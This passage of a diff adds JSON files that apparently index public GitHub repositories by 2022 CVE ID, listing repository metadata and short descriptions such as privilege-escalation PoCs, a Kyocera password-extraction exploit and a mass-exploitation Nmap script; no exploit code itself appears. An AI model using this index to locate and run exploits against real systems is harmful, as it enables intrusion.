false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0952.json b/2022/CVE-2022-0952.json new file mode 100644 index 0000000000..5014969e73 --- /dev/null +++ b/2022/CVE-2022-0952.json @@ -0,0 +1,33 @@ +[ + { + "id": 675703857, + "name": "CVE-2022-0952", + "full_name": "RandomRobbieBF\/CVE-2022-0952", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-0952", + "description": "Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update", + "fork": false, + "created_at": "2023-08-07T14:28:11Z", + "updated_at": "2024-08-12T20:32:23Z", + "pushed_at": "2023-08-09T10:14:42Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0995.json b/2022/CVE-2022-0995.json new file mode 100644 index 0000000000..aae187b98b --- /dev/null +++ b/2022/CVE-2022-0995.json @@ -0,0 +1,95 @@ +[ + { + "id": 474473639, + "name": "CVE-2022-0995", + "full_name": "Bonfee\/CVE-2022-0995", + "owner": { + "login": "Bonfee", + "id": 53857102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53857102?v=4", + "html_url": "https:\/\/github.com\/Bonfee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bonfee\/CVE-2022-0995", + "description": "CVE-2022-0995 exploit", + "fork": false, + "created_at": "2022-03-26T21:46:09Z", + "updated_at": "2024-11-19T23:46:23Z", + "pushed_at": "2022-03-27T09:07:01Z", + "stargazers_count": 495, + "watchers_count": 495, + "has_discussions": false, + "forks_count": 70, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 70, + "watchers": 495, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 612087603, + "name": "CVE-2022-0995", + "full_name": "AndreevSemen\/CVE-2022-0995", + "owner": { + "login": "AndreevSemen", + "id": 43631421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43631421?v=4", + "html_url": "https:\/\/github.com\/AndreevSemen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AndreevSemen\/CVE-2022-0995", + "description": "Реализация средств повышения привилегий в Linux", + "fork": false, + "created_at": "2023-03-10T07:05:45Z", + "updated_at": "2023-03-11T02:46:18Z", + "pushed_at": "2023-03-10T11:29:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 738494648, + "name": "CVE-2022-0995", + "full_name": "1nzag\/CVE-2022-0995", + "owner": { + "login": "1nzag", + "id": 29899371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29899371?v=4", + "html_url": "https:\/\/github.com\/1nzag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1nzag\/CVE-2022-0995", + "description": "CVE-2022-0995 exploit", + "fork": false, + "created_at": "2024-01-03T11:03:45Z", + "updated_at": "2024-01-03T11:20:25Z", + "pushed_at": "2024-01-03T11:12:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0997.json b/2022/CVE-2022-0997.json new file mode 100644 index 0000000000..928da9c278 --- /dev/null +++ b/2022/CVE-2022-0997.json @@ -0,0 +1,33 @@ +[ + { + "id": 499394110, + "name": "CVE-2022-0997", + "full_name": "henryreed\/CVE-2022-0997", + "owner": { + "login": "henryreed", + "id": 60915078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60915078?v=4", + "html_url": "https:\/\/github.com\/henryreed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/henryreed\/CVE-2022-0997", + "description": "Fidelis Network and Deception - Insecure File Permissions Privilege Escalation", + "fork": false, + "created_at": "2022-06-03T05:46:10Z", + "updated_at": "2023-03-24T09:25:52Z", + "pushed_at": "2022-06-03T06:57:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1011.json b/2022/CVE-2022-1011.json new file mode 100644 index 0000000000..dfb40b0be8 --- /dev/null +++ b/2022/CVE-2022-1011.json @@ -0,0 +1,33 @@ +[ + { + "id": 654390552, + "name": "CVE-2022-1011", + "full_name": "xkaneiki\/CVE-2022-1011", + "owner": { + "login": "xkaneiki", + "id": 26479696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26479696?v=4", + "html_url": "https:\/\/github.com\/xkaneiki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xkaneiki\/CVE-2022-1011", + "description": "这个漏洞感觉只能信息泄露?", + "fork": false, + "created_at": "2023-06-16T03:02:38Z", + "updated_at": "2024-02-21T03:54:26Z", + "pushed_at": "2023-06-16T04:13:42Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1012.json b/2022/CVE-2022-1012.json new file mode 100644 index 0000000000..ce1254749e --- /dev/null +++ b/2022/CVE-2022-1012.json @@ -0,0 +1,33 @@ +[ + { + "id": 564211865, + "name": "Linux-4.19.72_CVE-2022-1012", + "full_name": "nanopathi\/Linux-4.19.72_CVE-2022-1012", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/Linux-4.19.72_CVE-2022-1012", + "description": null, + "fork": false, + "created_at": "2022-11-10T08:30:12Z", + "updated_at": "2022-11-10T08:30:12Z", + "pushed_at": "2022-11-10T08:30:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1015.json b/2022/CVE-2022-1015.json new file mode 100644 index 0000000000..0642ccda8e --- /dev/null +++ b/2022/CVE-2022-1015.json @@ -0,0 +1,312 @@ +[ + { + "id": 476936527, + "name": "CVE-2022-1015", + "full_name": "pqlx\/CVE-2022-1015", + "owner": { + "login": "pqlx", + "id": 39501965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39501965?v=4", + "html_url": "https:\/\/github.com\/pqlx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pqlx\/CVE-2022-1015", + "description": "Local privilege escalation PoC for Linux kernel CVE-2022-1015", + "fork": false, + "created_at": "2022-04-02T03:27:11Z", + "updated_at": "2024-11-23T19:24:29Z", + "pushed_at": "2022-04-03T01:36:45Z", + "stargazers_count": 200, + "watchers_count": 200, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 200, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 477188610, + "name": "CVE-2022-1015-1016", + "full_name": "zanezhub\/CVE-2022-1015-1016", + "owner": { + "login": "zanezhub", + "id": 51524324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51524324?v=4", + "html_url": "https:\/\/github.com\/zanezhub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zanezhub\/CVE-2022-1015-1016", + "description": "Traducción al español de los CVE-2022-1015 y 1016 descubiertos y documentados por David.", + "fork": false, + "created_at": "2022-04-02T22:49:40Z", + "updated_at": "2022-04-14T08:37:05Z", + "pushed_at": "2022-04-14T08:26:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 526318455, + "name": "bob_kern_exp1", + "full_name": "shuttterman\/bob_kern_exp1", + "owner": { + "login": "shuttterman", + "id": 59496260, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59496260?v=4", + "html_url": "https:\/\/github.com\/shuttterman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shuttterman\/bob_kern_exp1", + "description": "CVE-2022-1015", + "fork": false, + "created_at": "2022-08-18T17:54:49Z", + "updated_at": "2022-08-07T06:18:16Z", + "pushed_at": "2022-08-06T12:40:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 556222673, + "name": "CVE-2022-1015", + "full_name": "ysanatomic\/CVE-2022-1015", + "owner": { + "login": "ysanatomic", + "id": 41269324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4", + "html_url": "https:\/\/github.com\/ysanatomic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysanatomic\/CVE-2022-1015", + "description": "A write-up and LPE PoC of an OOB read and write vulnerability in the Linux Kernel.", + "fork": false, + "created_at": "2022-10-23T10:57:43Z", + "updated_at": "2024-03-29T09:10:30Z", + "pushed_at": "2022-11-12T06:58:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 600659828, + "name": "CVE-2022-1015", + "full_name": "wlswotmd\/CVE-2022-1015", + "owner": { + "login": "wlswotmd", + "id": 80761172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80761172?v=4", + "html_url": "https:\/\/github.com\/wlswotmd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wlswotmd\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2023-02-12T07:06:40Z", + "updated_at": "2023-02-12T07:09:56Z", + "pushed_at": "2023-04-26T09:40:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610271922, + "name": "CVE-2022-1015", + "full_name": "delsploit\/CVE-2022-1015", + "owner": { + "login": "delsploit", + "id": 127108998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4", + "html_url": "https:\/\/github.com\/delsploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delsploit\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2023-03-06T12:50:43Z", + "updated_at": "2023-03-06T12:51:55Z", + "pushed_at": "2023-03-06T12:51:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617380197, + "name": "CVE-2022-1015", + "full_name": "pivik271\/CVE-2022-1015", + "owner": { + "login": "pivik271", + "id": 82135340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82135340?v=4", + "html_url": "https:\/\/github.com\/pivik271", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pivik271\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2023-03-22T09:16:58Z", + "updated_at": "2023-04-25T01:05:15Z", + "pushed_at": "2023-03-22T09:20:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 675264070, + "name": "CVE-2022-1015", + "full_name": "more-kohii\/CVE-2022-1015", + "owner": { + "login": "more-kohii", + "id": 87258637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87258637?v=4", + "html_url": "https:\/\/github.com\/more-kohii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/more-kohii\/CVE-2022-1015", + "description": "Linux Kernel 1-Day Analysis & Exploitation", + "fork": false, + "created_at": "2023-08-06T10:46:49Z", + "updated_at": "2024-07-02T09:40:21Z", + "pushed_at": "2023-08-08T00:42:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 698913839, + "name": "CVE-2022-1015", + "full_name": "0range1337\/CVE-2022-1015", + "owner": { + "login": "0range1337", + "id": 146405672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146405672?v=4", + "html_url": "https:\/\/github.com\/0range1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0range1337\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2023-10-01T11:18:48Z", + "updated_at": "2023-10-01T11:18:48Z", + "pushed_at": "2024-03-18T12:45:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872919160, + "name": "CVE-2022-1015", + "full_name": "seadragnol\/CVE-2022-1015", + "owner": { + "login": "seadragnol", + "id": 55611051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55611051?v=4", + "html_url": "https:\/\/github.com\/seadragnol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seadragnol\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2024-10-15T09:51:06Z", + "updated_at": "2024-10-15T10:09:11Z", + "pushed_at": "2024-10-15T10:09:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1026.json b/2022/CVE-2022-1026.json new file mode 100644 index 0000000000..d41c5c9d5b --- /dev/null +++ b/2022/CVE-2022-1026.json @@ -0,0 +1,95 @@ +[ + { + "id": 614407734, + "name": "kyocera-cve-2022-1026", + "full_name": "ac3lives\/kyocera-cve-2022-1026", + "owner": { + "login": "ac3lives", + "id": 26721330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26721330?v=4", + "html_url": "https:\/\/github.com\/ac3lives", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ac3lives\/kyocera-cve-2022-1026", + "description": "An unauthenticated data extraction vulnerability in Kyocera printers, which allows for recovery of cleartext address book and domain joined passwords", + "fork": false, + "created_at": "2023-03-15T14:23:41Z", + "updated_at": "2024-08-12T17:41:30Z", + "pushed_at": "2023-03-15T14:33:48Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 666781357, + "name": "nmap-printer-nse-scripts", + "full_name": "flamebarke\/nmap-printer-nse-scripts", + "owner": { + "login": "flamebarke", + "id": 39644720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39644720?v=4", + "html_url": "https:\/\/github.com\/flamebarke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flamebarke\/nmap-printer-nse-scripts", + "description": "NSE port of CVE-2022-1026 exploit for mass identification and exploitation", + "fork": false, + "created_at": "2023-07-15T14:56:55Z", + "updated_at": "2024-04-11T01:51:49Z", + "pushed_at": "2023-07-15T14:59:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814582796, + "name": "kygocera", + "full_name": "r0lh\/kygocera", + "owner": { + "login": "r0lh", + "id": 51697374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51697374?v=4", + "html_url": "https:\/\/github.com\/r0lh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0lh\/kygocera", + "description": "Improved Golang Version of Rapid7 PoC for CVE-2022-1026", + "fork": false, + "created_at": "2024-06-13T09:40:02Z", + "updated_at": "2024-06-13T12:18:39Z", + "pushed_at": "2024-06-13T12:18:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-10270.json b/2022/CVE-2022-10270.json new file mode 100644 index 0000000000..97bd1f8d6f --- /dev/null +++ b/2022/CVE-2022-10270.json @@ -0,0 +1,33 @@ +[ + { + "id": 587225929, + "name": "sunflower_exp", + "full_name": "baimaobg\/sunflower_exp", + "owner": { + "login": "baimaobg", + "id": 110097762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110097762?v=4", + "html_url": "https:\/\/github.com\/baimaobg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/baimaobg\/sunflower_exp", + "description": "Sunflower CVE-2022-10270 vulnerability exploitation tool", + "fork": false, + "created_at": "2023-01-10T08:56:15Z", + "updated_at": "2024-10-31T04:35:59Z", + "pushed_at": "2023-01-10T10:27:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1040.json b/2022/CVE-2022-1040.json new file mode 100644 index 0000000000..1be4e7a3e9 --- /dev/null +++ b/2022/CVE-2022-1040.json @@ -0,0 +1,219 @@ +[ + { + "id": 489284664, + "name": "CVE-2022-1040", + "full_name": "killvxk\/CVE-2022-1040", + "owner": { + "login": "killvxk", + "id": 309424, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/309424?v=4", + "html_url": "https:\/\/github.com\/killvxk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killvxk\/CVE-2022-1040", + "description": "may the poc with you", + "fork": false, + "created_at": "2022-05-06T08:56:04Z", + "updated_at": "2024-05-07T08:32:07Z", + "pushed_at": "2022-05-06T08:57:08Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 541212587, + "name": "Sophos-Vulnerability", + "full_name": "jam620\/Sophos-Vulnerability", + "owner": { + "login": "jam620", + "id": 17382838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17382838?v=4", + "html_url": "https:\/\/github.com\/jam620", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jam620\/Sophos-Vulnerability", + "description": "CVE-2022-1040", + "fork": false, + "created_at": "2022-09-25T15:15:01Z", + "updated_at": "2024-06-21T00:10:24Z", + "pushed_at": "2022-09-25T15:15:44Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 547354997, + "name": "cve-2022-1040", + "full_name": "Keith-amateur\/cve-2022-1040", + "owner": { + "login": "Keith-amateur", + "id": 83109029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83109029?v=4", + "html_url": "https:\/\/github.com\/Keith-amateur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Keith-amateur\/cve-2022-1040", + "description": "Save the trouble to open the burpsuite...", + "fork": false, + "created_at": "2022-10-07T14:44:42Z", + "updated_at": "2022-10-27T18:19:10Z", + "pushed_at": "2022-10-19T14:21:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 559654558, + "name": "CVE-2022-1040", + "full_name": "jackson5sec\/CVE-2022-1040", + "owner": { + "login": "jackson5sec", + "id": 17192323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17192323?v=4", + "html_url": "https:\/\/github.com\/jackson5sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jackson5sec\/CVE-2022-1040", + "description": "This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication", + "fork": false, + "created_at": "2022-10-30T19:20:57Z", + "updated_at": "2024-05-06T09:40:29Z", + "pushed_at": "2022-10-21T07:55:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 586568152, + "name": "CVE-2022-1040", + "full_name": "michealadams30\/CVE-2022-1040", + "owner": { + "login": "michealadams30", + "id": 113975732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113975732?v=4", + "html_url": "https:\/\/github.com\/michealadams30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michealadams30\/CVE-2022-1040", + "description": "Sophos EXploit", + "fork": false, + "created_at": "2023-01-08T15:46:00Z", + "updated_at": "2023-01-08T15:46:00Z", + "pushed_at": "2023-01-08T15:48:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696656893, + "name": "CVE-2022-1040", + "full_name": "Cyb3rEnthusiast\/CVE-2022-1040", + "owner": { + "login": "Cyb3rEnthusiast", + "id": 143934696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143934696?v=4", + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast\/CVE-2022-1040", + "description": "New exploitation of 2020 Sophos vuln", + "fork": false, + "created_at": "2023-09-26T07:26:42Z", + "updated_at": "2023-09-26T07:27:10Z", + "pushed_at": "2023-09-26T07:29:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752960539, + "name": "CVE-2022-1040", + "full_name": "xMr110\/CVE-2022-1040", + "owner": { + "login": "xMr110", + "id": 42313754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42313754?v=4", + "html_url": "https:\/\/github.com\/xMr110", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xMr110\/CVE-2022-1040", + "description": null, + "fork": false, + "created_at": "2024-02-05T07:35:41Z", + "updated_at": "2024-02-05T07:35:42Z", + "pushed_at": "2024-02-05T07:36:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1051.json b/2022/CVE-2022-1051.json new file mode 100644 index 0000000000..06b6df1701 --- /dev/null +++ b/2022/CVE-2022-1051.json @@ -0,0 +1,33 @@ +[ + { + "id": 491788638, + "name": "CVE-2022-1051", + "full_name": "V35HR4J\/CVE-2022-1051", + "owner": { + "login": "V35HR4J", + "id": 54109630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54109630?v=4", + "html_url": "https:\/\/github.com\/V35HR4J", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/V35HR4J\/CVE-2022-1051", + "description": "WPQA < 5.2 - Subscriber+ Stored Cross-Site Scripting via Profile fields", + "fork": false, + "created_at": "2022-05-13T06:50:25Z", + "updated_at": "2024-01-09T09:55:00Z", + "pushed_at": "2022-05-13T07:02:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1068.json b/2022/CVE-2022-1068.json new file mode 100644 index 0000000000..25b61fab07 --- /dev/null +++ b/2022/CVE-2022-1068.json @@ -0,0 +1,33 @@ +[ + { + "id": 586786744, + "name": "CVE-2022-1068", + "full_name": "webraybtl\/CVE-2022-1068", + "owner": { + "login": "webraybtl", + "id": 95903558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95903558?v=4", + "html_url": "https:\/\/github.com\/webraybtl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/webraybtl\/CVE-2022-1068", + "description": "Modbus Slave缓冲区溢出漏洞CVE-2022-1068分析与复现", + "fork": false, + "created_at": "2023-01-09T08:23:37Z", + "updated_at": "2023-09-05T10:24:54Z", + "pushed_at": "2023-07-06T06:36:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1077.json b/2022/CVE-2022-1077.json new file mode 100644 index 0000000000..e24d45a333 --- /dev/null +++ b/2022/CVE-2022-1077.json @@ -0,0 +1,33 @@ +[ + { + "id": 487389384, + "name": "CVE-2022-1077", + "full_name": "brosck\/CVE-2022-1077", + "owner": { + "login": "brosck", + "id": 71796063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71796063?v=4", + "html_url": "https:\/\/github.com\/brosck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brosck\/CVE-2022-1077", + "description": "TEM FLEX-1080\/FLEX-1085 1.6.0 log log.cgi Information Disclosure", + "fork": false, + "created_at": "2022-04-30T21:55:03Z", + "updated_at": "2024-08-23T16:29:36Z", + "pushed_at": "2022-04-30T22:08:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1096.json b/2022/CVE-2022-1096.json new file mode 100644 index 0000000000..bb5b4d2064 --- /dev/null +++ b/2022/CVE-2022-1096.json @@ -0,0 +1,33 @@ +[ + { + "id": 475602956, + "name": "Chrome-and-Edge-Version-Dumper", + "full_name": "Mav3r1ck0x1\/Chrome-and-Edge-Version-Dumper", + "owner": { + "login": "Mav3r1ck0x1", + "id": 55414177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55414177?v=4", + "html_url": "https:\/\/github.com\/Mav3r1ck0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mav3r1ck0x1\/Chrome-and-Edge-Version-Dumper", + "description": "Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096", + "fork": false, + "created_at": 